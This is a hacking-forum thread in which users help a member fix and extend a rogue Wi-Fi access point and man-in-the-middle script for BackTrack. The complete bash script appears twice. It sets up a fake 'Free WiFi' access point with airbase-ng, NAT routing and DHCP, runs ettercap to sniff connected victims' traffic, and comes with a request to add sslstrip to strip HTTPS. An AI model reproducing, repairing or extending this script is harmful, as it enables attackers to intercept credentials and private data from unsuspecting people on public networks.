Thread: rogue AP + MITM (tutorial or script request)

  1. #1
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Question rogue AP + MITM (tutorial or script request)

    Update: I've made my own tutorial by now: http://www.backtrack-linux.org/forum...-sniffing.html

    Cheers
    Last edited by Lucifer; 03-26-2010 at 06:54 PM.

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: rogue AP + MITM (tutorial or script request)

    That page is still available in Google Cache. It doesn't appear to have been archived. Get it while it's hot by searching Google for the following:

    Code:
    cache:http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-tutorial.html
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Question Re: rogue AP + MITM (tutorial or script request)

    lupin, thank you for replying.
    I've tried the link you've provided, but it doesn't seem to work, or I don't know how to get it.
    I've just tried to open it in a web browser, but the page wasn't available.

    cheers

  4. #4
    Junior Member
    Join Date
    Feb 2010
    Posts
    42

    Default Re: rogue AP + MITM (tutorial or script request)

    Quote Originally Posted by Lucifer View Post
    lupin, thank you for replying.
    I've tried the link you've provided, but it doesn't seem to work, or I don't know how to get it.
    I've just tried to open it in a web browser, but the page wasn't available.

    cheers
    As the man said, "Search Google" with what he pasted...
    -Wes-

  5. #5
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    4

    Default Re: rogue AP + MITM (tutorial or script request)

    Hey there,

    I came across the same problem. The cached website is just trying to download images and other stuff we don't need, which it is unable to.

    The solution is to click "Text-only version" in the top left of the page. This strips all the graphics out and just shows you the text, which is all we need to get going. If you have any other bookmarked pages you want to view the same way, load the page in your browser, copy the URL, google it, then click "cached" under the result that's given, and click "Text-only version" to see the text.

    Hope this helps,
    Kalibur

  6. #6
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Question Re: rogue AP + MITM (tutorial or script request)

    Thanks for your help guys.
    Now I'm trying to run the script, but I'm having some trouble with DHCP.
    The tutorial/script from the old forum was made for BackTrack 3 and needs some updates.
    Can someone with knowledge review this script?
    I modified it a bit, as it used 'dhcpd' but I think BackTrack 4 final uses 'dhcp3'. The DHCP server isn't working properly, so it must be the code that's wrong. I've never coded anything before, and my BackTrack/Linux skills are still very limited, so please bear with me.
    I'm using this dhcpd.conf: Deathray [bash] Paste - f1859fad7 - Pastebin.com
    the current script:
    -----------------------
    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcpd3 airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    konsole -e airbase-ng -e "$ESSID" -P -C 15 -v $WIFACE &
    sleep 10
    ifconfig at0 mtu 1400
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/lib/dhcp3/dhcpd.leases'
    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd &
    konsole -e dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &

    konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward

    The part that's highlighted is what must be wrong, or the dhcpd.conf isn't right.
    Also, would someone be so kind as to add sslstrip functionality to this script?
    Any help is greatly appreciated.

    Credit goes out to Deathray for making the script.

    L.
    Last edited by Lucifer; 02-23-2010 at 09:25 PM.

  7. #7
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Question Re: rogue AP + MITM (tutorial or script request)

    Somebody? I'll be very thankful if you can help me get this script right. The DHCP server part is wrong: when I connect to the fake AP, I'm getting an IP, but no internet. Maybe the gateway is wrong. I'm really searching in the dark about how to configure the dhcpd.conf, so some help would be great.

    Lucifer

  8. #8
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: rogue AP + MITM (tutorial or script request)

    Quote Originally Posted by Lucifer View Post
    Credit goes out to Deathray for making the script.
    I'm back from the dead. I gave up my time for security and Linux once school started, to concentrate on that; practically everything we learned about was related to Microsoft in some way, so I wanted 100% concentration for school. But I'm done now, I've got a steady job, and I'm going to try and pick up on it all once again. So hi! Hope everyone is doing well.

  9. #9
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: rogue AP + MITM (tutorial or script request)

    Quote Originally Posted by Lucifer View Post
    Thanks for your help guys.
    Now I'm trying to run the script, but I'm having some trouble with DHCP.
    The tutorial/script from the old forum was made for BackTrack 3 and needs some updates.
    Can someone with knowledge review this script?
    I modified it a bit, as it used 'dhcpd' but I think BackTrack 4 final uses 'dhcp3'. The DHCP server isn't working properly, so it must be the code that's wrong. I've never coded anything before, and my BackTrack/Linux skills are still very limited, so please bear with me.
    I'm using this dhcpd.conf: Deathray [bash] Paste - f1859fad7 - Pastebin.com
    the current script:
    -----------------------
    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcpd3 airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    konsole -e airbase-ng -e "$ESSID" -P -C 15 -v $WIFACE &
    sleep 10
    ifconfig at0 mtu 1400
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/lib/dhcp3/dhcpd.leases'
    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd &
    konsole -e dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &

    konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward

    The part that's highlighted is what must be wrong, or the dhcpd.conf isn't right.
    Also, would someone be so kind as to add sslstrip functionality to this script?
    Any help is greatly appreciated.

    Credit goes out to Deathray for making the script.

    L.
    Check out this thread. I modded his script to work with BT4, and added some minor things to it.
    http://www.backtrack-linux.org/forum...tml#post157888